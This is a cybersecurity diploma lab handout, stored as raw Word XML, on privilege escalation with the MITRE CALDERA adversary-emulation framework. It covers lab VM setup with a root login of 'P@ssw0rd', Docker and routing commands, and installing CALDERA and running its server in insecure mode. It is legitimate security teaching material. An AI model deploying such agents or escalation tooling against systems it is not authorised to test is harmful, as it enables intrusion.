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CB766CD" w14:textId="73757307" w:rsidR="00346F13" w:rsidRPr="0026280E" w:rsidRDefault="00346F13" w:rsidP="004D1FBB">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:line="18pt" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0026280E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>School of Informatics &amp; IT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EF97EB" w14:textId="11DDE1D4" w:rsidR="004A5B8F" w:rsidRPr="0026280E" w:rsidRDefault="00135DB6" w:rsidP="004D1FBB">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:line="18pt" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Diploma in Cybersecurity &amp; Digital Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159A2E2D" w14:textId="6622D993" w:rsidR="000320CF" w:rsidRPr="0026280E" w:rsidRDefault="008D0B0F" w:rsidP="004D1FBB">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:line="18pt" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ethical Hacking and Intrusion Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FEFCB2" w14:textId="1DB5B022" w:rsidR="000320CF" w:rsidRDefault="000320CF" w:rsidP="004D1FBB">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:line="18pt" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E32B77B" w14:textId="771D08F5" w:rsidR="00C04CA4" w:rsidRPr="00C12E86" w:rsidRDefault="00C04CA4" w:rsidP="00C12E86">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:line="18pt" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab </w:t>
      </w:r>
      <w:r w:rsidR="00727171">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00727171">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Privilege escalation with MITRE CALDERA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E414B16" w14:textId="77777777" w:rsidR="00E95561" w:rsidRPr="00575324" w:rsidRDefault="00E95561" w:rsidP="00E95561">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:ind w:start="0pt" w:firstLine="0pt"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK2"/>
      <w:r w:rsidRPr="00575324">
        <w:t>Learning Outcomes</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="19EA5EB1" w14:textId="77777777" w:rsidR="00E95561" w:rsidRDefault="00E95561" w:rsidP="00E95561">
      <w:pPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>By the end of this exercise, the student should be able to demonstrate the following items:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA4EB21" w14:textId="0571E6F3" w:rsidR="00E95561" w:rsidRPr="00727171" w:rsidRDefault="00727171" w:rsidP="00727171">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Set up MITRE CALDERA and deploy an agent </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>onto  a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C76E933" w14:textId="3F2CB6FF" w:rsidR="00727171" w:rsidRPr="00727171" w:rsidRDefault="00727171" w:rsidP="00727171">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Create an adversary profile and run it in an </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>operation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="770095F0" w14:textId="6C643D3A" w:rsidR="00727171" w:rsidRPr="00727171" w:rsidRDefault="00727171" w:rsidP="00727171">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Gain root access from a low privilege machine using MITRE CALDERA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460A630F" w14:textId="77777777" w:rsidR="00727171" w:rsidRDefault="00727171" w:rsidP="00727171">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74DD5755" w14:textId="77777777" w:rsidR="00E95561" w:rsidRDefault="00E95561" w:rsidP="00E95561">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:ind w:start="0pt" w:firstLine="0pt"/>
      </w:pPr>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B06CAFB" w14:textId="77777777" w:rsidR="00727171" w:rsidRDefault="00727171" w:rsidP="00E95561">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00727171">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In the realm of ethical hacking, staying one step ahead of potential adversaries is crucial to ensure the security of computer networks and systems. Privilege escalation is a technique used by ethical hackers to gain unauthorized access and elevate their privileges within a target system. MITRE CALDERA is a powerful and widely acclaimed open-source framework that empowers ethical hackers to simulate, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00727171">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00727171">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, and respond to advanced cyber threats, with a specific focus on privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36155D30" w14:textId="77777777" w:rsidR="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6"/>
    <w:p w14:paraId="081A945E" w14:textId="566BD0C8" w:rsidR="00660FF6" w:rsidRPr="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="18pt" w:lineRule="auto"/>
        <w:ind w:start="0pt" w:firstLine="0pt"/>
      </w:pPr>
      <w:r>
        <w:t>Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DCB144" w14:textId="79ED9E56" w:rsidR="00E95561" w:rsidRDefault="00E95561" w:rsidP="00E95561">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00660FF6">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D896D1F" w14:textId="77777777" w:rsidR="00E95561" w:rsidRDefault="00E95561" w:rsidP="00E95561">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080726D">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Pre-Requisite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C1BFE" w14:textId="63E40CE3" w:rsidR="00E95561" w:rsidRDefault="00E95561" w:rsidP="00E95561">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080726D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Kindly ensure that you have downloaded the KALI-LINUX Virtual Machine</w:t>
      </w:r>
      <w:r w:rsidR="00FD4861">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the TARGET-MACHINE Virtual Machine</w:t>
      </w:r>
      <w:r w:rsidRPr="0080726D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0080726D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>POLITEMall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0080726D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3019C7CF" w14:textId="36DA3C43" w:rsidR="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00E95561">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="433AE864" w14:textId="77777777" w:rsidR="00E95561" w:rsidRDefault="00E95561" w:rsidP="00E95561">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9C3774" w14:textId="7C70A7B0" w:rsidR="008E6A0E" w:rsidRPr="008E6A0E" w:rsidRDefault="008E6A0E" w:rsidP="008E6A0E">
      <w:r>
        <w:t>Launch your KALI-LINUX and TARGET-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">MACHINE  </w:t>
      </w:r>
      <w:r w:rsidR="00FD4861">
        <w:t>Virtual</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FD4861">
        <w:t xml:space="preserve"> Machine</w:t>
      </w:r>
      <w:r>
        <w:t>s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCDFBE0" w14:textId="41D2362C" w:rsidR="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6">
      <w:bookmarkStart w:id="1" w:name="_Hlk142056458"/>
      <w:r>
        <w:t>In the TARGET-MACHINE VM, login using the following credential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0011EAA1" w14:textId="71C1D44A" w:rsidR="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Username: root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B26F17A" w14:textId="09CBB65E" w:rsidR="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Password: P@ssw0rd</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="1E028A0D" w14:textId="77777777" w:rsidR="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6">
      <w:pPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3753F513" w14:textId="1ECF9E8F" w:rsidR="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6">
      <w:pPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In this lab, a custom Docker image will only be used to establish a remote network server that you will need to use for your caldera </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>escelation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> challenge. This is to prevent any accidental modifications on the configuration settings of the KALI-LINUX Virtual Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718715F0" w14:textId="77777777" w:rsidR="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6"/>
    <w:p w14:paraId="30B16F02" w14:textId="77777777" w:rsidR="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6"/>
    <w:p w14:paraId="6C57F249" w14:textId="77777777" w:rsidR="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6"/>
    <w:p w14:paraId="0D8AD906" w14:textId="77777777" w:rsidR="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6"/>
    <w:p w14:paraId="02BFD4A2" w14:textId="0244D85E" w:rsidR="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6">
      <w:pPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Launch the Terminal application in TARGET-MACHINE VM, and type in the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D430083" w14:textId="77777777" w:rsidR="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6"/>
    <w:p w14:paraId="21C54D56" w14:textId="32CFFA4A" w:rsidR="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00660FF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>cd Documents/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00660FF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>ProjectCaldera</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78D5F16C" w14:textId="19FE7E60" w:rsidR="00660FF6" w:rsidRPr="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-compose </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18A99DE3" w14:textId="77777777" w:rsidR="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6"/>
    <w:p w14:paraId="2341CABD" w14:textId="274AA61A" w:rsidR="00660FF6" w:rsidRPr="00660FF6" w:rsidRDefault="00660FF6" w:rsidP="00660FF6">
      <w:r>
        <w:t>Leave the terminal in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737F04E4" w14:textId="77777777" w:rsidR="00E95561" w:rsidRDefault="00E95561" w:rsidP="00E95561">
      <w:pPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Launch the Terminal application in KALI-LINUX, and type in the following commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F896241" w14:textId="77777777" w:rsidR="00727171" w:rsidRDefault="00727171" w:rsidP="00E95561">
      <w:pPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF7860A" w14:textId="22B46F7B" w:rsidR="00727171" w:rsidRPr="00660FF6" w:rsidRDefault="00727171" w:rsidP="00CF3918">
      <w:pPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00727171">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00727171">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> route add 172.20.0.0/16 via 192.168.100.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C964C3" w14:textId="28AC2462" w:rsidR="00E95561" w:rsidRDefault="00E95561" w:rsidP="00ED664D">
      <w:pPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6090C5A9" w14:textId="77777777" w:rsidR="007D4B1A" w:rsidRPr="00F349B3" w:rsidRDefault="007D4B1A" w:rsidP="00ED664D">
      <w:pPr>
        <w:spacing w:line="13.80pt" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A3A2A87" w14:textId="57546D5A" w:rsidR="00E95561" w:rsidRDefault="00E95561" w:rsidP="00E95561">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00660FF6">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00727171">
        <w:t>Installing Mitre Caldera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FFA331" w14:textId="2761712F" w:rsidR="001D7149" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Hlk142056722"/>
      <w:r>
        <w:t>Run the following commands in your Kali-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>LINUX :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0BB58349" w14:textId="77777777" w:rsidR="007D4B1A" w:rsidRPr="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4720EB2C" w14:textId="77777777" w:rsidR="007D4B1A" w:rsidRPr="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">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before="0pt" w:after="0pt"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4B1A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>git clone https://github.com/mitre/caldera.git --recursive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EAD0D3" w14:textId="77777777" w:rsidR="007D4B1A" w:rsidRPr="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">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before="0pt" w:after="0pt"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4B1A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>cd caldera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5A0053" w14:textId="77777777" w:rsidR="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">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before="0pt" w:after="0pt"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4B1A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">pip3 install -r </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D4B1A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>requirements.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="60F901E8" w14:textId="77777777" w:rsidR="007D4B1A" w:rsidRPr="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">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before="0pt" w:after="0pt"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4789097B" w14:textId="763DBFCB" w:rsidR="007D4B1A" w:rsidRPr="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">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before="0pt" w:after="0pt"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4B1A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Once done, run the following command to launch the server inside caldera </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D4B1A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>folder</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="297647D1" w14:textId="77777777" w:rsidR="007D4B1A" w:rsidRPr="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">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before="0pt" w:after="0pt"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ACB498B" w14:textId="77777777" w:rsidR="007D4B1A" w:rsidRPr="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">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before="0pt" w:after="0pt"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D4B1A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
        <w:t>python3 server.py --insecure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6458C444" w14:textId="77777777" w:rsidR="007D4B1A" w:rsidRDefault="007D4B1A" w:rsidP="007D4B1A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
